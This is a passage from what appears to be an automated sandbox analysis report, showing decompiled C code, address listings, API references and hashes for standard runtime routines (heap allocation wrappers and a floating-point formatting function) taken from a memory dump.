0x00a37dd1
0x00a37dd9
0x00a37dd9
0x00000000
0x00a37dd9
0x00000000
0x00a37dcf
0x00a37dde
0x00a37dde
0x00a37de1
0x00a37de1
0x00a37de7
0x00a37de8
0x00a37df1
0x00a37df2
0x00a37df9
0x00a37dfa
0x00a37dfc
0x00a37dfd
0x00a37e1e
0x00a37e46
0x00a37e4e
0x00a37e4f
0x00a37e50
0x00a37e50
0x00a37e5a
0x00a37e6a
0x00a37e6c
0x00a37e83
0x00a37e6e
0x00a37e6e
0x00a37e6e
0x00a37e6e
0x00a37e73
0x00000000
0x00a37e73
0x00a37e5c
0x00a37e5c
0x00a37e61
0x00a37e7a
0x00a37e7a
0x00a37e7a
0x00a37e8a
0x00a37e8b
0x00a37e8f
0x00a37efa

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00A37D8C

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 5dac0e45b9945e10e7e481cbaf304c8fbec34947ecc650be50b7614ef6956d4e
Instruction ID: 02efafe1d026e647eed3faa2032db4a503da5bbd6fe4420170cec033054b6996
Opcode Fuzzy Hash: 5dac0e45b9945e10e7e481cbaf304c8fbec34947ecc650be50b7614ef6956d4e
Instruction Fuzzy Hash: E341F6B150839CAEDB32CB648C84AFABBBDEF55704F2404DDF58A86142E235AD45DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A34DC6, Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A34DC6(void* __ecx, void* __edi, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t9;
				void* _t13;
				signed int _t15;
				void* _t17;
				signed int _t18;
				signed int _t23;
				long _t24;

				_t17 = __ecx;
				_t23 = _a4;
				if(_t23 == 0) {
					L2:
					_t24 = _t23 * _a8;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xa4eda0, 8, _t24); // executed
						_t9 = _t8;
						if(_t9 != 0) {
							break;
						}
						__eflags = E00A346CC();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00A353A4())) = 0xc;
							_t9 = 0;
							__eflags = 0;
							L9:
							return _t9;
						}
						_t13 = E00A3903E(_t17, _t18, _t24, __eflags);
						_t17 = _t24;
						__eflags = _t13;
						if(_t13 == 0) {
							goto L8;
						}
					}
					goto L9;
				}
				_t15 = 0xffffffe0;
				_t18 = _t15 % _t23;
				if(_t15 / _t23 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00a34dc6
0x00a34dcc
0x00a34dd1
0x00a34ddf
0x00a34ddf
0x00a34de5
0x00a34de7
0x00a34de7
0x00a34dfe
0x00a34e07
0x00a34e0d
0x00a34e0f
0x00000000
0x00000000
0x00a34def
0x00a34df1
0x00a34e13
0x00a34e18
0x00a34e1e
0x00a34e1e
0x00a34e20
0x00a34e22
0x00a34e22
0x00a34df4
0x00a34df9
0x00a34dfa
0x00a34dfc
0x00000000
0x00000000
0x00a34dfc
0x00000000
0x00a34e11
0x00a34dd7
0x00a34dd8
0x00a34ddd
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A36A3F,00000001,00000364,?,?,?,00A353A9,00A32D9D,?,?), ref: 00A34E07

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: dfd89de8f975bdaa7fb77386e96b6435e96b8853d73bc8cbddb416f89da03b9e
Instruction ID: 7d0288ec129ac3988be1ecd05d2ff44f9c3a24843cb467890a809c12639b3bdd
Opcode Fuzzy Hash: dfd89de8f975bdaa7fb77386e96b6435e96b8853d73bc8cbddb416f89da03b9e
Instruction Fuzzy Hash: C9F0E93555512467DB316B75ED01B9B7B58FB8A7E0F144126F404DA194C6A0BD1082E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A34CDB, Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A34CDB(void* __ecx, void* __edi, long _a4) {
				void* __esi;
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				long _t12;

				_t7 = __ecx;
				_t12 = _a4;
				if(_t12 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00A353A4())) = 0xc;
					_t3 = 0;
					__eflags = 0;
					L8:
					return _t3;
				}
				if(_t12 == 0) {
					_t12 = _t12 + 1;
				}
				while(1) {
					_t3 = RtlAllocateHeap( *0xa4eda0, 0, _t12); // executed
					if(_t3 != 0) {
						break;
					}
					__eflags = E00A346CC();
					if(__eflags == 0) {
						goto L7;
					}
					_t5 = E00A3903E(_t7, _t8, _t12, __eflags);
					_t7 = _t12;
					__eflags = _t5;
					if(_t5 == 0) {
						goto L7;
					}
				}
				goto L8;
			}

0x00a34cdb
0x00a34ce1
0x00a34ce7
0x00a34d19
0x00a34d1e
0x00a34d24
0x00a34d24
0x00a34d26
0x00a34d28
0x00a34d28
0x00a34ceb
0x00a34ced
0x00a34ced
0x00a34d04
0x00a34d0d
0x00a34d15
0x00000000
0x00000000
0x00a34cf5
0x00a34cf7
0x00000000
0x00000000
0x00a34cfa
0x00a34cff
0x00a34d00
0x00a34d02
0x00000000
0x00000000
0x00a34d02
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A38A6C,00000000,?,?,00A34ED7,?,00000008,?,00A360E1,?,?), ref: 00A34D0D

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecf21e93634f24b72192e6faa9fa9efd6ea8db49367e28feed79191e60b11531
Instruction ID: 65d6515195aa0bc7ae46a7658a6c35805431f774d963391a82e9f63a07e5c528
Opcode Fuzzy Hash: ecf21e93634f24b72192e6faa9fa9efd6ea8db49367e28feed79191e60b11531
Instruction Fuzzy Hash: 18E092396061266ADA616BB5ED01B6F7A5CAF8A7E4F100261FC069B1A1DB90FC00C6E0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A3ADEE, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1412
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00A3ADEE(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				void* __edi;
				void* __esi;
				signed int _t725;
				signed int _t735;
				signed int _t736;
				signed int _t742;
				intOrPtr _t744;
				intOrPtr* _t745;
				intOrPtr* _t748;
				signed int _t753;
				signed int _t754;
				signed int _t758;
				signed int _t760;
				signed int _t766;
				intOrPtr _t768;
				void* _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t780;
				signed int _t781;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				void* _t795;
				signed int _t796;
				signed int _t798;
				signed int _t799;
				signed int _t804;
				signed int _t805;
				signed int _t810;
				signed int _t811;
				signed int _t814;
				signed int _t818;
				intOrPtr _t824;
				signed int _t825;
				signed int* _t828;
				signed int _t831;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				char* _t846;
				signed int _t848;
				signed int _t852;
				signed int _t853;
				signed int _t857;
				signed int _t859;
				signed int _t864;
				signed int _t872;
				signed int _t875;
				signed int _t877;
				signed int _t880;
				signed int _t881;
				signed int _t882;
				signed int _t883;
				signed int _t886;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t902;
				char* _t903;
				signed int _t905;
				signed int _t909;
				signed int _t910;
				signed int _t911;
				signed int* _t913;
				void* _t915;
				signed int _t917;
				signed int _t922;
				signed int _t924;
				signed int _t929;
				signed int _t932;
				signed int _t936;
				signed int* _t943;
				intOrPtr _t945;
				void* _t946;
				signed int _t948;
				signed int* _t952;
				unsigned int _t963;
				signed int _t964;
				void* _t967;
				signed int _t968;
				void* _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t981;
				signed int _t986;
				signed int _t989;
				unsigned int _t992;
				signed int _t993;
				void* _t996;
				signed int _t997;
				void* _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				signed int _t1006;
				signed int* _t1011;
				signed int _t1013;
				signed int _t1023;
				void _t1026;
				signed int _t1029;
				unsigned int _t1030;
				signed int _t1031;
				void* _t1032;
				signed int _t1034;
				signed int _t1043;
				signed int _t1044;
				signed int _t1047;
				signed int _t1048;
				signed char _t1049;
				signed int _t1050;
				signed int _t1051;
				signed int _t1052;
				signed int _t1054;
				signed int _t1058;
				signed int _t1062;
				signed int _t1063;
				signed int _t1065;
				signed int _t1067;
				signed int _t1068;
				signed int _t1070;
				signed int _t1071;
				signed int _t1072;
				signed int _t1073;
				signed int _t1074;
				signed int _t1075;
				signed int _t1076;
				signed int _t1077;
				signed int _t1078;
				signed int _t1079;
				signed int _t1080;
				signed int _t1081;
				signed int _t1082;
				signed int _t1083;
				unsigned int _t1084;
				void* _t1087;
				intOrPtr _t1089;
				signed int _t1090;
				signed int _t1091;
				signed int _t1092;
				signed int* _t1096;
				void* _t1100;
				void* _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1104;
				signed int _t1107;
				signed int _t1108;
				signed int _t1109;
				signed int _t1113;
				signed int _t1114;
				signed int _t1115;
				signed int _t1118;
				char _t1123;
				signed int _t1125;
				signed int _t1126;
				signed int _t1127;
				signed int _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1135;
				signed int _t1136;
				signed int _t1137;
				signed int _t1138;
				signed int _t1139;
				unsigned int _t1142;
				void* _t1146;
				void* _t1147;
				unsigned int _t1148;
				signed int _t1153;
				signed int _t1154;
				signed int _t1156;
				signed int _t1157;
				intOrPtr* _t1159;
				signed int _t1160;
				signed int _t1161;
				signed int _t1164;
				signed int _t1165;
				signed int _t1168;
				signed int _t1170;
				signed int _t1171;
				signed int _t1172;
				void* _t1173;
				signed int _t1176;
				signed int _t1177;
				signed int _t1178;
				void* _t1181;
				signed int _t1182;
				signed int _t1183;
				signed int _t1184;
				signed int _t1185;
				signed int _t1187;
				signed int _t1188;
				signed int* _t1190;
				signed int _t1191;
				signed int _t1192;
				signed int _t1193;
				signed int _t1195;
				signed int _t1196;
				intOrPtr* _t1198;
				intOrPtr* _t1199;
				unsigned int _t1201;
				signed int _t1203;
				signed int _t1204;
				signed int _t1207;
				signed int _t1213;
				signed int _t1217;
				signed int _t1218;
				intOrPtr _t1220;
				intOrPtr _t1221;
				signed int _t1226;
				signed int _t1228;
				signed int _t1229;
				void* _t1230;
				signed int _t1231;
				signed int _t1232;
				signed int _t1233;
				signed int _t1235;
				signed int _t1237;
				signed int _t1238;
				signed int _t1239;
				signed int _t1243;
				signed int _t1244;
				signed int _t1245;
				signed int _t1246;
				void* _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1252;
				signed int _t1254;
				signed int _t1256;
				signed int _t1258;
				signed int* _t1260;
				signed int* _t1264;
				signed int _t1273;

				_t725 =  *0xa4dc28; // 0x4f268f78
				_v8 = _t725 ^ _t1258;
				_t1023 = _a20;
				_t1159 = _a16;
				_v1924 = _t1159;
				_v1920 = _t1023;
				E00A3A90A( &_v1944, _t1159, __eflags);
				_t1217 = _a8;
				_t1034 = _t1217;
				_t730 = 0x2d;
				if((_t1034 & 0x80000000) == 0) {
					_t730 = 0x120;
				}
				 *_t1159 = _t730;
				 *((intOrPtr*)(_t1159 + 8)) = _t1023;
				_t1160 = _a4;
				if((_t1217 & 0x7ff00000) != 0) {
					L5:
					_t735 = E00A36B33( &_a4);
					_pop(_t1038);
					__eflags = _t735;
					if(_t735 != 0) {
						_t1038 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t736 = _t735 - 1;
					__eflags = _t736;
					if(_t736 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t753 = _t736 - 1;
						__eflags = _t753;
						if(_t753 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t754 = _t753 - 1;
							__eflags = _t754;
							if(_t754 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t754 == 1;
								if(_t754 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1160;
									_a8 = _t1217 & 0x7fffffff;
									_t1273 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1164 = _v1896;
									_v1916 = _a12 + 1;
									_t1043 = _t1164 >> 0x14;
									_t758 = _t1043;
									_t760 = _t758 & 0x000007ff;
									__eflags = _t760;
									if(_t760 != 0) {
										_t1115 = 0;
										_t760 = 0;
										__eflags = 0;
									} else {
										_t1115 = 1;
									}
									_t1165 = _t1164 & 0x000fffff;
									_t1026 = _v1900 + _t760;
									asm("adc edi, esi");
									__eflags = _t1115;
									_t1044 = _t1043 & 0x000007ff;
									_t1226 = _t1044 - 0x434 + (0 | _t1115 != 0x00000000) + 1;
									_v1872 = _t1226;
									E00A3CFA0(_t1044, _t1273);
									_push(_t1044);
									_push(_t1044);
									 *_t1260 = _t1273;
									_t766 = E00A3F260(E00A3D0B0(_t1165, _t1226), _t1273);
									_v1904 = _t766;
									__eflags = _t766 - 0x7fffffff;
									if(_t766 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t766 - 0x80000000;
										if(_t766 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1026;
									__eflags = _t1165;
									_v464 = _t1165;
									_t1029 = (0 | _t1165 != 0x00000000) + 1;
									_v472 = _t1029;
									__eflags = _t1226;
									if(_t1226 < 0) {
										__eflags = _t1226 - 0xfffffc02;
										if(_t1226 == 0xfffffc02) {
											L101:
											_t768 =  *((intOrPtr*)(_t1258 + _t1029 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1047 = 0;
												__eflags = 0;
											} else {
												_t1047 = _t768 + 1;
											}
											_t769 = 0x20;
											_t770 = _t769 - _t1047;
											__eflags = _t770 - 1;
											_t771 = _t770 & 0xffffff00 | _t770 - 0x00000001 > 0x00000000;
											__eflags = _t1029 - 0x73;
											_v1865 = _t771;
											_t1048 = _t1047 & 0xffffff00 | _t1029 - 0x00000073 > 0x00000000;
											__eflags = _t1029 - 0x73;
											if(_t1029 != 0x73) {
												L107:
												_t772 = 0;
												__eflags = 0;
											} else {
												__eflags = _t771;
												if(_t771 == 0) {
													goto L107;
												} else {
													_t772 = 1;
												}
											}
											__eflags = _t1048;
											if(_t1048 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												_push(0);
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1260 =  &(_t1260[4]);
											} else {
												__eflags = _t772;
												if(_t772 != 0) {
													goto L126;
												} else {
													_t1082 = 0x72;
													__eflags = _t1029 - _t1082;
													if(_t1029 < _t1082) {
														_t1082 = _t1029;
													}
													__eflags = _t1082 - 0xffffffff;
													if(_t1082 != 0xffffffff) {
														_t1246 = _t1082;
														_t1198 =  &_v468 + _t1082 * 4;
														_v1880 = _t1198;
														while(1) {
															__eflags = _t1246 - _t1029;
															if(_t1246 >= _t1029) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1198;
															}
															_t210 = _t1246 - 1; // 0x70
															__eflags = _t210 - _t1029;
															if(_t210 >= _t1029) {
																_t1142 = 0;
																__eflags = 0;
															} else {
																_t1142 =  *(_t1198 - 4);
															}
															_t1198 = _t1198 - 4;
															_t943 = _v1880;
															_t1246 = _t1246 - 1;
															 *_t943 = _t1142 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t943 - 4;
															__eflags = _t1246 - 0xffffffff;
															if(_t1246 == 0xffffffff) {
																break;
															}
															_t1029 = _v472;
														}
														_t1226 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1082;
													} else {
														_t218 = _t1082 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1168 = 1 - _t1226;
											_push(1);
											_pop(_t1030);
											_t1031 = _t1030 >> 5;
											_t1228 = _t1031 << 2;
											E00A31E90(_t1168,  &_v1396, 0, _t1228);
											_t1049 = _t1168 & 0x0000001f;
											__eflags = 1;
											 *(_t1258 + _t1228 - 0x570) = 1 << _t1049;
											_t780 = _t1031 + 1;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1083 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1083;
											__eflags = _t1029 - _t1083;
											if(_t1029 == _t1083) {
												_t1146 = 0;
												__eflags = 0;
												while(1) {
													_t945 =  *((intOrPtr*)(_t1258 + _t1146 - 0x570));
													__eflags = _t945 -  *((intOrPtr*)(_t1258 + _t1146 - 0x1d0));
													if(_t945 !=  *((intOrPtr*)(_t1258 + _t1146 - 0x1d0))) {
														goto L101;
													}
													_t1146 = _t1146 + 4;
													__eflags = _t1146 - 8;
													if(_t1146 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1147 = 0;
															__eflags = 0;
														} else {
															_t1147 = _t945 + 1;
														}
														_t946 = 0x20;
														_t1247 = _t1083;
														__eflags = _t946 - _t1147 - _t1083;
														_t948 =  &_v460;
														_v1880 = _t948;
														_t1199 = _t948;
														_t171 =  &_v1865;
														 *_t171 = _t946 - _t1147 - _t1083 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1247 - _t1029;
															if(_t1247 >= _t1029) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1199;
															}
															_t175 = _t1247 - 1; // 0x0
															__eflags = _t175 - _t1029;
															if(_t175 >= _t1029) {
																_t1148 = 0;
																__eflags = 0;
															} else {
																_t1148 =  *(_t1199 - 4);
															}
															_t1199 = _t1199 - 4;
															_t952 = _v1880;
															_t1247 = _t1247 - 1;
															 *_t952 = _t1148 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t952 - 4;
															__eflags = _t1247 - 0xffffffff;
															if(_t1247 == 0xffffffff) {
																break;
															}
															_t1029 = _v472;
														}
														__eflags = _v1865;
														_t1084 = _t1083 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1083;
														_t1201 = _t1084 >> 5;
														_t1248 = _t1201;
														_v1884 = _t1084;
														_t1249 = _t1248 << 2;
														E00A31E90(_t1201,  &_v1396, 0, _t1249);
														 *(_t1258 + _t1249 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t780 = _t1201 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t780;
										_t1032 = 0x1cc;
										_v936 = _t780;
										_t781 = _t780 << 2;
										__eflags = _t781;
										_push(_t781);
										_push( &_v1396);
										_push(0x1cc);
										_push( &_v932);
										L313();
										_t1264 =  &(_t1260[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1250 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1250;
										__eflags = _t1029 - _t1250;
										if(_t1029 != _t1250) {
											L53:
											_t963 = _v1872 + 1;
											_t964 = _t963 & 0x0000001f;
											_t1087 = 0x20;
											_v1876 = _t964;
											_t1203 = _t963 >> 5;
											_v1872 = _t1203;
											_v1908 = _t1087 - _t964;
											_t967 = E00A3F240(1, _t1087 - _t964, 0);
											_t1089 =  *((intOrPtr*)(_t1258 + _t1029 * 4 - 0x1d4));
											_t968 = _t967 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t968;
											_v1912 =  !_t968;
											if( *_t108 == 0) {
												_t1090 = 0;
												__eflags = 0;
											} else {
												_t1090 = _t1089 + 1;
											}
											_t970 = 0x20;
											_t971 = _t970 - _t1090;
											_t1153 = _t1029 + _t1203;
											__eflags = _v1876 - _t971;
											_v1892 = _t1153;
											_t972 = _t971 & 0xffffff00 | _v1876 - _t971 > 0x00000000;
											__eflags = _t1153 - 0x73;
											_v1865 = _t972;
											_t1091 = _t1090 & 0xffffff00 | _t1153 - 0x00000073 > 0x00000000;
											__eflags = _t1153 - 0x73;
											if(_t1153 != 0x73) {
												L59:
												_t973 = 0;
												__eflags = 0;
											} else {
												__eflags = _t972;
												if(_t972 == 0) {
													goto L59;
												} else {
													_t973 = 1;
												}
											}
											__eflags = _t1091;
											if(_t1091 != 0) {
												L81:
												__eflags = 0;
												_t1032 = 0x1cc;
												_push(0);
												_v1400 = 0;
												_v472 = 0;
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1260 =  &(_t1260[4]);
											} else {
												__eflags = _t973;
												if(_t973 != 0) {
													goto L81;
												} else {
													_t1092 = 0x72;
													__eflags = _t1153 - _t1092;
													if(_t1153 >= _t1092) {
														_t1153 = _t1092;
														_v1892 = _t1092;
													}
													_t981 = _t1153;
													_v1880 = _t981;
													__eflags = _t1153 - 0xffffffff;
													if(_t1153 != 0xffffffff) {
														_t1154 = _v1872;
														_t1252 = _t1153 - _t1154;
														__eflags = _t1252;
														_t1096 =  &_v468 + _t1252 * 4;
														_v1888 = _t1096;
														while(1) {
															__eflags = _t981 - _t1154;
															if(_t981 < _t1154) {
																break;
															}
															__eflags = _t1252 - _t1029;
															if(_t1252 >= _t1029) {
																_t1207 = 0;
																__eflags = 0;
															} else {
																_t1207 =  *_t1096;
															}
															__eflags = _t1252 - 1 - _t1029;
															if(_t1252 - 1 >= _t1029) {
																_t986 = 0;
																__eflags = 0;
															} else {
																_t986 =  *(_t1096 - 4);
															}
															_t989 = _v1880;
															_t1096 = _v1888 - 4;
															_v1888 = _t1096;
															 *(_t1258 + _t989 * 4 - 0x1d0) = (_t1207 & _v1884) << _v1876 | (_t986 & _v1912) >> _v1908;
															_t981 = _t989 - 1;
															_t1252 = _t1252 - 1;
															_v1880 = _t981;
															__eflags = _t981 - 0xffffffff;
															if(_t981 != 0xffffffff) {
																_t1029 = _v472;
																continue;
															}
															break;
														}
														_t1153 = _v1892;
														_t1203 = _v1872;
														_t1250 = 2;
													}
													_t1204 = _t1203;
													__eflags = _t1204;
													if(_t1204 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1204 << 2);
														_t1260 =  &(_t1260[3]);
													}
													__eflags = _v1865;
													_t1032 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1153;
													} else {
														_v472 = _t1153 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1250;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1100 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1258 + _t1100 - 0x570)) -  *((intOrPtr*)(_t1258 + _t1100 - 0x1d0));
												if( *((intOrPtr*)(_t1258 + _t1100 - 0x570)) !=  *((intOrPtr*)(_t1258 + _t1100 - 0x1d0))) {
													goto L53;
												}
												_t1100 = _t1100 + 4;
												__eflags = _t1100 - 8;
												if(_t1100 != 8) {
													continue;
												} else {
													_t992 = _v1872 + 2;
													_t993 = _t992 & 0x0000001f;
													_t1101 = 0x20;
													_t1102 = _t1101 - _t993;
													_v1888 = _t993;
													_t1254 = _t992 >> 5;
													_v1876 = _t1254;
													_v1908 = _t1102;
													_t996 = E00A3F240(1, _t1102, 0);
													_v1896 = _v1896 & 0x00000000;
													_t997 = _t996 - 1;
													__eflags = _t997;
													asm("bsr ecx, edi");
													_v1884 = _t997;
													_v1912 =  !_t997;
													if(_t997 == 0) {
														_t1103 = 0;
														__eflags = 0;
													} else {
														_t1103 = _t1102 + 1;
													}
													_t999 = 0x20;
													_t1000 = _t999 - _t1103;
													_t1156 = _t1254 + 2;
													__eflags = _v1888 - _t1000;
													_v1880 = _t1156;
													_t1001 = _t1000 & 0xffffff00 | _v1888 - _t1000 > 0x00000000;
													__eflags = _t1156 - 0x73;
													_v1865 = _t1001;
													_t1104 = _t1103 & 0xffffff00 | _t1156 - 0x00000073 > 0x00000000;
													__eflags = _t1156 - 0x73;
													if(_t1156 != 0x73) {
														L28:
														_t1002 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1001;
														if(_t1001 == 0) {
															goto L28;
														} else {
															_t1002 = 1;
														}
													}
													__eflags = _t1104;
													if(_t1104 != 0) {
														L50:
														__eflags = 0;
														_t1032 = 0x1cc;
														_push(0);
														_v1400 = 0;
														_v472 = 0;
														_push( &_v1396);
														_push(0x1cc);
														_push( &_v468);
														L313();
														_t1260 =  &(_t1260[4]);
													} else {
														__eflags = _t1002;
														if(_t1002 != 0) {
															goto L50;
														} else {
															_t1107 = 0x72;
															__eflags = _t1156 - _t1107;
															if(_t1156 >= _t1107) {
																_t1156 = _t1107;
																_v1880 = _t1107;
															}
															_t1108 = _t1156;
															_v1892 = _t1108;
															__eflags = _t1156 - 0xffffffff;
															if(_t1156 != 0xffffffff) {
																_t1157 = _v1876;
																_t1256 = _t1156 - _t1157;
																__eflags = _t1256;
																_t1011 =  &_v468 + _t1256 * 4;
																_v1872 = _t1011;
																while(1) {
																	__eflags = _t1108 - _t1157;
																	if(_t1108 < _t1157) {
																		break;
																	}
																	__eflags = _t1256 - _t1029;
																	if(_t1256 >= _t1029) {
																		_t1213 = 0;
																		__eflags = 0;
																	} else {
																		_t1213 =  *_t1011;
																	}
																	__eflags = _t1256 - 1 - _t1029;
																	if(_t1256 - 1 >= _t1029) {
																		_t1013 = 0;
																		__eflags = 0;
																	} else {
																		_t1013 =  *(_v1872 - 4);
																	}
																	_t1113 = _v1892;
																	 *(_t1258 + _t1113 * 4 - 0x1d0) = (_t1013 & _v1912) >> _v1908 | (_t1213 & _v1884) << _v1888;
																	_t1108 = _t1113 - 1;
																	_t1256 = _t1256 - 1;
																	_t1011 = _v1872 - 4;
																	_v1892 = _t1108;
																	_v1872 = _t1011;
																	__eflags = _t1108 - 0xffffffff;
																	if(_t1108 != 0xffffffff) {
																		_t1029 = _v472;
																		continue;
																	}
																	break;
																}
																_t1156 = _v1880;
																_t1254 = _v1876;
															}
															__eflags = _t1254;
															if(_t1254 != 0) {
																_t1109 = _t1254;
																__eflags = 0;
																memset( &_v468, 0, _t1109 << 2);
																_t1260 =  &(_t1260[3]);
															}
															__eflags = _v1865;
															_t1032 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1156;
															} else {
																_v472 = _t1156 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1006 = 4;
													__eflags = 1;
													_v1396 = _t1006;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1006);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1032);
										_push( &_v932);
										L313();
										_t1264 =  &(_t1260[4]);
									}
									_t784 = _v1904;
									_t1050 = 0xa;
									_v1912 = _t1050;
									__eflags = _t784;
									if(_t784 < 0) {
										_t785 =  ~_t784;
										_t786 = _t785 / _t1050;
										_v1880 = _t786;
										_t1051 = _t785 % _t1050;
										_v1884 = _t1051;
										__eflags = _t786;
										if(_t786 == 0) {
											L249:
											_t1052 = _t1051;
											__eflags = _t1052;
											if(_t1052 != 0) {
												_t825 =  *(0xa457f4 + _t1052 * 4);
												_v1896 = _t825;
												__eflags = _t825;
												if(_t825 == 0) {
													L260:
													__eflags = 0;
